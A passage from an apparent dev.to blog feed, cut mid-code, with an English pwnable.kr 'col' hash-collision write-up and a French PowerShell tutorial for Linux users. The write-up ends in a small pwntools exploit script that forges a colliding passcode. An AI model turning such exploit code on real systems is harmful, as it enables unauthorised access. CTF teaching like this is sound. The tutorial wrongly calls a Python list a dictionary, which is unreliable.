class="mi">20</span><span class="p">){</span> <span class="n">printf</span><span class="p">(</span><span class="s">"passcode length should be 20 bytes</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="n">hashcode</span> <span class="o">==</span> <span class="n">check_password</span><span class="p">(</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="p">)){</span> <span class="n">system</span><span class="p">(</span><span class="s">"/bin/cat flag"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="n">printf</span><span class="p">(</span><span class="s">"wrong passcode.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>Which can be described in 3 steps:</p> <ul> <li>check if you have strictly one argument to the command line call</li> <li>argument should be 20 bytes long</li> <li>if the given password is equal to <code>hashcode</code> then we pwned the challenge.</li> </ul> <h1> What do we do from here? </h1> <p><code>0x21DD09EC</code> is our first clue. We can't do much with that, let's transform this in decimals (it makes sense later).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Python 3.9.1 (default, Dec 13 2020, 11:55:53) [GCC 10.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. &gt;&gt;&gt; 0x21DD09EC 568134124 &gt;&gt;&gt; </code></pre> </div> <p>Then the <code>check_password</code> is our second step. </p> <p>The loop goes 5 times and return a result. This means that whatever we give the function will be added 5 fold, hence:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>568134124 = 5x </code></pre> </div> <p>Then:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>568134124 / 5 = x </code></pre> </div> <p>But!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>&gt;&gt;&gt; 568134124 / 5 113626824.8 </code></pre> </div> <p>We need to work with integers here not floats. Then, let's modify the equations to enter the remainder or the function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>568134124 = 4x + x' </code></pre> </div> <p>(There is probably a more mathy-way to do that, let me know in the comments, I left school quite a while ago)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>&gt;&gt;&gt; 568134124 // 5 113626824 </code></pre> </div> <p>Then:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>568134124 = 4 * 113626824 + x' 568134124 - (4 * 113626824) = x' 113626828 = x' </code></pre> </div> <p>Test it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>&gt;&gt;&gt; 568134124 == (4 * 113626824) + 113626828 True </code></pre> </div> <p>All good. Let's write the exploit. For that, we are going to use <a href="https://pwntools.readthedocs.io">pwntools</a>.</p> <p>The two decimals section will be in little endian and for a 32-bits architecture, thus:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">p32</span><span class="p">(</span><span class="mi">113626824</span><span class="p">,</span> <span class="n">endian</span><span class="o">=</span><span class="s">'little'</span><span class="p">)</span> <span class="c1"># and </span><span class="n">p32</span><span class="p">(</span><span class="mi">113626828</span><span class="p">,</span> <span class="n">endian</span><span class="o">=</span><span class="s">'little'</span><span class="p">)</span> </code></pre> </div> <p>Here is the exploit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">p32</span><span class="p">(</span><span class="mi">113626824</span><span class="p">,</span> <span class="n">endian</span><span class="o">=</span><span class="s">'little'</span><span class="p">)</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">113626828</span><span class="p">,</span> <span class="n">endian</span><span class="o">=</span><span class="s">'little'</span><span class="p">)</span> <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s">'./col'</span><span class="p">,</span> <span class="n">payload</span><span class="p">])</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="k">print</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> </code></pre> </div> <p>Why the payload before the call to the process? Because we need to pass the payload as a command line argument.</p> <p>Why the whole calculation and not just the result? Because we need a 20 bytes payload. We are passing the instruction and not just the result. The details of the how and the why are a bit obscure to me. I tried a couple of things and this worked in the end.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>~/.../pwnable.kr/2 <span class="o">&gt;&gt;&gt;</span> python boum.py <span class="o">[</span>+] Starting <span class="nb">local </span>process <span class="s1">'./col'</span>: pid 99792 b<span class="s1">'/bin/cat: flag: No such file or directory\n'</span> </code></pre> </div> <p>And it's pwned! Hope you enjoyed it!</p> ctf security chris Thu, 28 Jan 2021 18:55:18 +0000 https://dev.to/evilcel3ri/powershell-quand-on-ne-connait-que-linux-kfe https://dev.to/evilcel3ri/powershell-quand-on-ne-connait-que-linux-kfe <p><a href="https://fr.wikipedia.org/wiki/Windows_PowerShell">Powershell</a> est une programme de ligne de commande qui marche sur différentes plateformes mais est essentiellement utilisée sur Windows. C'est codé en .NET (prononcé: <em>dot net</em>) un framework pour C# (prononcé: <em>si charp</em>) et donc répond a certains concepts de <a href="https://fr.wikipedia.org/wiki/Programmation_orient%C3%A9e_objet">programmation orientée objet</a> comme... les (surprise) objets.</p> <p>En gros, chaque fonction que l'on verra reverra comme résultat une structure sur laquelle on pourra agir. Contrairement à Bash (voir articles précédents <a href="https://dev.to/christalib/la-ligne-de-commande-linux-pour-les-impatient-e-s-49ne">1</a> et <a href="https://dev.to/christalib/la-ligne-de-commande-linux-pour-les-impatient-e-s-2-cas-pratique-3bph">2</a>) qui nous retourne plutôt des listes ou des variables.</p> <p>Si vous ne connaissez pas les concepts de programmation orientée objet, ce n'est pas grave. Dans cet article, nous allons surtout essayer de refaire les exercices des deux premiers articles en Powershell et nous n'aborderons pas des concepts trop avancés.</p> <p>Powershell est bien calibré pour les environnements Windows, ce programme vous permet non seulement de travailler avec du texte et des fichiers mais aussi de gérer votre ordinateur... Scripter avec Powershell est un vrai atout lorsque vous travailler sur ce type de machines.</p> <p>Si vous voulez plus d'informations, la <a href="https://docs.microsoft.com/en-us/powershell/">documentation</a> de Microsoft est plutôt extensive.</p> <h2> Bases </h2> <p>Si vous utilisez Windows 10 ou plus, Powershell devrait déjà être installé et vous pouvez trouver la ligne de commande en cherchant "powershell" dans vos programmes.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iYawCG29--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/frnsbm0w8yho5zv514t0.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iYawCG29--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/frnsbm0w8yho5zv514t0.png" alt="Alt Text"></a></p> <p>Si vous utilisez Linux et que faire des trucs comme ça n'hérisse pas votre poil de libriste, il y a <a href="https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-linux?view=powershell-7.1">moyen d'installer Powershell sur votre machine</a> ! Même via Snap, si ce n'est pas beau tout ça !</p> <p>Voyons quelques fonctions de base :</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Linux (Bash)</th> <th>Powershell</th> <th>Options</th> </tr> </thead> <tbody> <tr> <td><code>cat</code></td> <td><code>Get-Content</code></td> <td> <code>-Path</code>, <code>-Tail</code>, <code>-Head</code> </td> </tr> <tr> <td><code>pwd</code></td> <td><code>Get-Location</code></td> <td></td> </tr> <tr> <td><code>cd</code></td> <td> <code>Set-Location</code> (or <code>cd</code>)</td> <td></td> </tr> <tr> <td><code>ls</code></td> <td> <code>Get-ChildItem</code> (or <code>dir</code>)</td> <td> <code>-Path</code>, <code>-File</code>, <code>-Directory</code>, <code>-Filter</code>, <code>-Recurse</code>, <code>-Hidden</code>, <code>-ErrorAction SilentlyContinue</code> </td> </tr> <tr> <td><code>cp</code></td> <td><code>Copy-Item</code></td> <td> <code>-Path</code>, <code>-Destination</code> </td> </tr> <tr> <td><code>mv</code></td> <td><code>Move-Item</code></td> <td> <code>-Path</code>, <code>-Destination</code> </td> </tr> <tr> <td><code>mkdir</code></td> <td><code>New-Item</code></td> <td> <code>-ItemType</code>, <code>-Name</code> </td> </tr> <tr> <td><code>wc</code></td> <td><code>Measure-Object</code></td> <td><code>-word</code></td> </tr> <tr> <td><code>man</code></td> <td><code>Get-Help</code></td> <td></td> </tr> <tr> <td><code>wget</code></td> <td><code>Invoke-WebRequest</code></td> <td> <code>-Uri</code>, <code>-OutFile</code> </td> </tr> </tbody> </table></div> <blockquote> <p>Les majuscules ne sont pas obligatoire, <code>Get-Content</code> et <code>get-content</code> sont équivalents. Cependant, n'hésitez jamais à perdre un peu de rapidité à la frappe pour une meilleure lecture.</p> </blockquote> <p>Ok, eh bien, réimplémentons les exercices des premiers articles en Powershell !</p> <h3> Mouvements </h3> <p>Trouvons où nous sommes dans l'arbre (<code>pwd</code>) :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-Location</span><span class="w"> </span></code></pre> </div> <blockquote> <p>L'équivalent de <code>/</code> sous Linux est <code>C:\</code> sous Windows.</p> </blockquote> <p>Déplaçons-nous :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Set-Location</span><span class="w"> </span><span class="nx">C:\</span><span class="w"> </span></code></pre> </div> <p>Ou si vous êtes sous Linux avec Powershell :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Set-Location</span><span class="w"> </span><span class="nx">/</span><span class="w"> </span></code></pre> </div> <blockquote> <p>Lancer <code>Set-Location</code> sans arguments est comme lancer <code>cd</code> tout seul, il vous amènera au dossier de base de votre compte (<code>C:\Users\chris</code> ou <code>/home/chris</code> en fonction de votre système).</p> </blockquote> <p>Lister le contenu d'un dossier :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">dir</span><span class="w"> </span><span class="c"># ou bien</span><span class="w"> </span><span class="n">Get-ChildItem</span><span class="w"> </span></code></pre> </div> <p>Jouez avec les options indiquées sur le table, par example que font les fonctions suivantes ?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-ChildItem</span><span class="w"> </span><span class="nt">-File</span><span class="w"> </span><span class="n">Get-ChildItem</span><span class="w"> </span><span class="nt">-Directory</span><span class="w"> </span><span class="n">Get-ChildItem</span><span class="w"> </span><span class="nt">-Directory</span><span class="w"> </span><span class="nt">-Recurse</span><span class="w"> </span></code></pre> </div> <h3> Création de fichiers et de dossiers </h3> <p>Pour la création de fichiers et de dossiers, c'est même plus simple qu'avec<br> Linux, puisqu'il nous suffira d'utiliser une seule fonction : <code>New-Item</code> (nouvel<br> object).</p> <p>Pour un fichier :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">New-Item</span><span class="w"> </span><span class="nt">-ItemType</span><span class="w"> </span><span class="nx">file</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="nx">pouet</span><span class="w"> </span></code></pre> </div> <p>Donnera :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="w"> </span><span class="n">Directory:</span><span class="w"> </span><span class="nx">/home/chris/Documents/blog</span><span class="w"> </span><span class="n">Mode</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="w"> </span><span class="nx">Length</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="o">-------------</span><span class="w"> </span><span class="o">------</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="o">----------</span><span class="w"> </span><span class="mi">27</span><span class="n">/01/2021</span><span class="w"> </span><span class="nx">16:07</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="nx">pouet</span><span class="w"> </span></code></pre> </div> <p>Et pour un dossier :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">New-item</span><span class="w"> </span><span class="nt">-ItemType</span><span class="w"> </span><span class="nx">directory</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="nx">dirdir</span><span class="w"> </span></code></pre> </div> <p>Résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="w"> </span><span class="n">Directory:</span><span class="w"> </span><span class="nx">/home/chris/Documents/blog</span><span class="w"> </span><span class="n">Mode</span><span class="w"> </span><span class="nx">LastWriteTime</span><span class="w"> </span><span class="nx">Length</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="o">---------</span><span class="w"> </span><span class="o">-------------</span><span class="w"> </span><span class="o">------</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="n">d----</span><span class="w"> </span><span class="nx">27/01/2021</span><span class="w"> </span><span class="nx">16:07</span><span class="w"> </span><span class="nx">dirdir</span><span class="w"> </span></code></pre> </div> <p>Déplaçons le fichier <code>pouet</code> dans <code>dirdir</code> :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="c"># Windows</span><span class="w"> </span><span class="n">Move-Item</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">pouet</span><span class="w"> </span><span class="nt">-Destination</span><span class="w"> </span><span class="nx">dirdir\pouet</span><span class="w"> </span><span class="c"># Linux</span><span class="w"> </span><span class="n">Move-Item</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">pouet</span><span class="w"> </span><span class="nt">-Destination</span><span class="w"> </span><span class="nx">dirdir/pouet</span><span class="w"> </span></code></pre> </div> <h2> Que les choses sérieuses commencent ! </h2> <p>Téléchargeons notre premier fichier :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Invoke-Webrequest</span><span class="w"> </span><span class="nt">-Uri</span><span class="w"> </span><span class="s2">"https://archive.org/stream/Frankenstein1818Edition/frank-a5_djvu.txt"</span><span class="w"> </span><span class="nt">-OutFile</span><span class="w"> </span><span class="nx">texte_complet.txt</span><span class="w"> </span></code></pre> </div> <p>Normalement, ici nous utiliserions <code>grep</code>. Sauf qu'en Powershell ça n'existe par vraiment. Il faudra utiliser <code>Where-Object</code> si vous recherchez des objets retournés par une autre fonction Powershell (comme <code>Get-Process</code>) ou bien <code>Select-String</code> quand vous travaillez avec des chaînes de caractères (des <em>strings</em> en anglais).</p> <p>Donc :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">texte_complet.txt</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s2">"love"</span><span class="w"> </span></code></pre> </div> <p>Vous remarquez que le résultat est plus précis par défaut que la version par défaut de <code>grep</code>. En effet, sans devoir le préciser, <code>Select-String</code> indique le numéro de la ligne ainsi que le fichier où la résultat a été trouvé.</p> <p>Et la version plus précise :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">texte_complet.txt</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s2">" love "</span><span class="w"> </span></code></pre> </div> <p>Pour compter le nombre d'occurrences :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">texte_complet.txt</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s2">" love "</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Measure-Object</span><span class="w"> </span><span class="nt">-Word</span><span class="w"> </span></code></pre> </div> <p>Ok, super. Passons à la liste de mots de passe :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Invoke-WebRequest</span><span class="w"> </span><span class="nt">-Uri</span><span class="w"> </span><span class="s2">"https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt"</span><span class="w"> </span><span class="nt">-OutFile</span><span class="w"> </span><span class="nx">liste_mdp.txt</span><span class="w"> </span></code></pre> </div> <p>Pour trier de façon unique, nous utiliserons la même logique sur Linux : afficher le texte et trier le résultat.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-Content</span><span class="w"> </span><span class="nx">liste_mdp.txt</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Sort-Object</span><span class="w"> </span><span class="nt">-Unique</span><span class="w"> </span></code></pre> </div> <p>Et créons un fichier d'un coup<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-Content</span><span class="w"> </span><span class="nx">liste_mdp.txt</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Sort-Object</span><span class="w"> </span><span class="nt">-Unique</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="nx">nouvelle_liste.txt</span><span class="w"> </span></code></pre> </div> <p>Et voilà le travail !</p> <h2> Fonctions plus avancées </h2> <p>Passons maintenant au second article, et réessayons de refaire tout cela en Powershell !</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--fwMqcGrx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/zzsk0tnz9v4thphthc94.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fwMqcGrx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/zzsk0tnz9v4thphthc94.gif" alt="Alt Text"></a></p> <p>Cette instruction est parfaitement valide en Powershell :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">echo</span><span class="w"> </span><span class="s1">'Robert;Dupont;rue du Verger, 12; "Michel";"Durand";" av. de la Ferme, 89 "; "Michel ""Michele""";"Durand";" av. de la Ferme, 89"; "Michel;Michele";"Durand";"av. de la Ferme, 89"; '</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="nx">exemple.csv</span><span class="w"> </span></code></pre> </div> <p>Maintenant, les choses se compliquent. Powershell n'a pas vraiment d'équivalent 1 à 1 pour <code>cut</code> (voir cette réponse sur <a href="https://stackoverflow.com/questions/24634022/what-is-an-equivalent-of-nix-cut-command-in-powershell">stackoverflow</a> -- en anglais). Il y a plusieurs solutions sur Internet, nous allons prendre une qui parait un peu moins simple mais qui pourrait être utile dans le futur.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-Content</span><span class="w"> </span><span class="nx">exemple.csv</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Split</span><span class="p">(</span><span class="s2">";"</span><span class="p">)[</span><span class="mi">1</span><span class="p">]}</span><span class="w"> </span></code></pre> </div> <p>Que se passe-t-il ici ? La première partie avant le <code>|</code> récupère le contenu de <code>exemple.csv</code> et l'envoie via <code>|</code> à la fonction suivante. <code>ForEach-Object</code> est une fonction qui va nous permettre de travail sur un objet énumérable.</p> <blockquote> <p>En programmation, un énumérable est une structure, ordonnée ou non qui contient multiples valeurs, dès fois de type différent mais pas nécessairement. Par exemple, un dictionnaire en Python : [1, "un", True]. Retenez que ce type de structure contient multiple valeurs et peut donc être passée dans une boucle qui va... (vous le devinez) l'énumérer.</p> </blockquote> <p>Ensuite, <code>$_</code> est une variable, ce type de variable et de notation est assez commun en Powershell lorsqu'on utilise des <em>pipes</em> (<code>|</code>). Donc ici <code>$_</code> fait référence à <code>exemple.csv</code>.</p> <p>La fonction <code>split</code> (assez commune, elle existe en Ruby et en Python entre autres), va couper la ligne à un délimiteur donné ici <code>;</code>.</p> <p><code>[1]</code> va prendre la... <em>seconde</em> occurrence après le délimiteur !</p> <blockquote> <p>Attention, les ordinateurs comptent à partir de 0. Donc pour prendre le premier objet après le split, ça sera [0] et non [1].</p> </blockquote> <p>Donc, nous aurons comme résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">/home/chris/Documents/blog/dirdir</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-Content</span><span class="w"> </span><span class="nx">exemple.csv</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Split</span><span class="p">(</span><span class="s2">";"</span><span class="p">)[</span><span class="mi">1</span><span class="p">]}</span><span class="w"> </span><span class="n">Dupont</span><span class="w"> </span><span class="s2">"Durand"</span><span class="w"> </span><span class="s2">"Durand"</span><span class="w"> </span><span class="n">Michele</span><span class="s2">" </span></code></pre> </div> <blockquote> <p>Essayez de jouer avec les délimiteurs et les index (<code>[1]</code>, <code>[0]</code>). Par exemple que donne l'index <code>[-2]</code> (<code>Get-Content exemple.csv | ForEach-Object {$_.split(";")[-2]}</code>) ?</p> </blockquote> <p><strong>Variables</strong></p> <p>Pour déclarer une variable en Powershell, <code>$</code> sera aussi nécessaire pour la<br> déclaration. Donc :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$nombre_deux</span><span class="o">=</span><span class="mi">2</span><span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="nv">$nombre_deux</span><span class="w"> </span></code></pre> </div> <p>Et la réassignation fonctionne aussi de la même manière :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$nombre_deux</span><span class="o">=</span><span class="mi">2</span><span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="nv">$nombre_deux</span><span class="w"> </span></code></pre> </div> <p>Résultat : 2<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$nombre_deux</span><span class="o">=</span><span class="mi">3</span><span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="nv">$nombre_deux</span><span class="w"> </span></code></pre> </div> <p>Résultat : 3</p> <p><strong>boucles</strong></p> <p>En ce qui concerne les boucles, nous avons déjà vu la fonction <code>ForEach-Object</code> qui fonctionne avec des <em>objets</em>, donc des structures assez spécifiques. Il existe un autre manière de faire des boucles avec <code>ForEach</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="kr">ForEach</span><span class="w"> </span><span class="p">(</span><span class="nv">$ligne</span><span class="w"> </span><span class="kr">in</span><span class="w"> </span><span class="n">Get-Content</span><span class="w"> </span><span class="nx">exemple.csv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="n">echo</span><span class="w"> </span><span class="nv">$ligne</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <blockquote> <p>Pour plus d'information sur les boucles en Powershell, la <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/foreach-object?view=powershell-7.1">documentation</a> de Microsoft est assez bien écrite.</p> </blockquote> <p>Vous vous souvenez de cette ligne cryptique ?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">somme</span><span class="o">=</span>0<span class="p">;</span> <span class="k">for </span>i <span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>0 100<span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nv">somme</span><span class="o">=</span><span class="si">$(</span><span class="nb">expr</span> <span class="nv">$somme</span> + <span class="nv">$i</span><span class="si">)</span><span class="p">;</span> <span class="k">done</span><span class="p">;</span> <span class="nb">echo</span> <span class="nv">$somme</span> </code></pre> </div> <p>Essayons de le faire en Powershell !<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="nv">$</span><span class="nn">global</span><span class="p">:</span><span class="nv">somme</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="kr">ForEach</span><span class="w"> </span><span class="p">(</span><span class="nv">$i</span><span class="w"> </span><span class="kr">in</span><span class="w"> </span><span class="mi">0</span><span class="o">..</span><span class="mi">100</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="nv">$somme</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$somme</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nv">$i</span><span class="p">};</span><span class="w"> </span><span class="n">echo</span><span class="w"> </span><span class="nv">$somme</span><span class="w"> </span></code></pre> </div> <p>Pourquoi <code>global</code> devant la déclaration de la variable <code>somme</code> ? Parce que les variables en Powershell on un <em>scope</em>.</p> <p>Revenons à la notion de bloc mentionnée plus haut.</p> <p>Exemple 1 :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function { bloc } </code></pre> </div> <p>Exemple 2 :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>if condition { bloc } else if condition 2 { bloc 2 } else { bloc 3 } </code></pre> </div> <p>Un bloc est une instruction ou une suite d'instructions de code qui se trouvent à l'intérieur d'une fonction (que ça soit une fonction en tant que telle ou dans une branche d'une fonction conditionnelle comme un <code>if</code>). En fonction des langages de programmation, les variables peuvent voyager entre les blocs ou non.</p> <p>Dans le cas ou ce n'est pas possible, on parle de variable "locale" (à savoir locales au bloc) ou globale (globales au programme entier).</p> <p>Donc ici, Powershell a besoin qu'on définisse la variable <code>$somme</code> comme globale afin de réaliser la dernière instruction <code>echo $somme</code> qui se trouve à l'extérieur du bloc de la fonction <code>ForEach</code>.</p> <p>Si nous ne le faisons pas, <code>$somme</code> à la fin de l'instruction sera égal à 0. En effet, <code>$somme</code> dans le bloc de la fonction <code>ForEach</code> est une variable locale et donc n'est pas la même que la variable <code>$somme</code> définie en-dehors de la fonction.</p> <p>À part cela, <code>seq 0 100</code> a son équivalent <code>0..100</code> et pas besoin d'utiliser <code>expr</code> pour réaliser une fonction arithmétique.</p> <h2> Cas pratique : Fouiller une page web </h2> <p>Allons-y, Alonso !</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--D61aK_nq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/fhyfwp7277a8s64t3t7w.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--D61aK_nq--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/fhyfwp7277a8s64t3t7w.gif" alt="Alt Text"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Invoke-WebRequest</span><span class="w"> </span><span class="nt">-Uri</span><span class="w"> </span><span class="s2">"https://en.wikipedia.org/wiki/Hedy_Lamarr"</span><span class="w"> </span><span class="nt">-OutFile</span><span class="w"> </span><span class="nx">page.html</span><span class="w"> </span></code></pre> </div> <p>Ensuite :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">page.html</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s1">'href=\"/wiki/'</span><span class="w"> </span></code></pre> </div> <p>Ce coup-ci, on utilisera la pleine puissance de <code>Select-String</code> plutôt que de le faire passer dans différents processus. De plus, nous avons déjà récupéré la liste des liens internes de la page qui commencent avec <code>/wiki/</code>.</p> <blockquote> <p><em>Note sur les regex</em> : <code>Select-String</code> peut parfaitement utiliser des regex pour des recherches avancées. Par exemple : <code>Select-String -Path page.html -Pattern '\w'</code>. Voir l'<a href="https://dev.to/christalib/les-regex-attrapez-les-tous-5alg">article sur les regex</a> pour plus d'informations sur ce type d'instructions.</p> </blockquote> <p>Cependant, la liste n'est pas "propre", il est encore difficile de travailler avec car les objets retournés par la fonction <code>Select-String</code> ne nous permettent pas de travailler dessus directement. Du coup, nous allons préciser notre<br> recherche et puiser dans les ressources de Powershell.</p> <p>Nous devons d'abord récupérer la liste des chaînes de caractères qui commencent par <code>href="/wiki</code> et qui se terminent par un espace. En regex, ça donne : <code>href=\"/wiki/\S+</code> :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">page.html</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s1">'href=\"/wiki/\S+'</span><span class="w"> </span></code></pre> </div> <blockquote> <p>Rappel : <code>\S</code> tout caractère sauf espace (donc, alphanumérique et spéciaux) et <code>+</code> cherchera de une à infini nombre d'occurrences.</p> </blockquote> <p>Résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(...) /home/chris/Documents/blog/page.html:1250: &lt;li id="footer-places-about"&gt;&lt;a href="/wiki/Wikipedia:About" title="Wikipedia:About"&gt;About Wikipedia&lt;/a&gt;&lt;/li&gt; /home/chris/Documents/blog/page.html:1251: &lt;li id="footer-places-disclaimer"&gt;&lt;a href="/wiki/Wikipedia:General_disclaimer" title="Wikipedia:General disclaimer"&gt;Disclaimers&lt;/a&gt;&lt;/li&gt; </code></pre> </div> <p>Nous allons maintenant itérer sur chaque objet de notre recherche<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span 